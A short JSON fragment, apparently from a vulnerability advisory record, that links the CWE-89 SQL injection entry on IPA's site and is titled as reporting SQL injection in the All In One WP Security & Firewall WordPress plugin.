          "#text": "https://www.ipa.go.jp/en/security/vulnerabilities/cwe.html",
          "@id": "CWE-89",
          "@title": "SQL Injection(CWE-89)"
        }
      ],
      "title": "All In One WP Security \u0026 Firewall vulnerable to SQL injection"
    }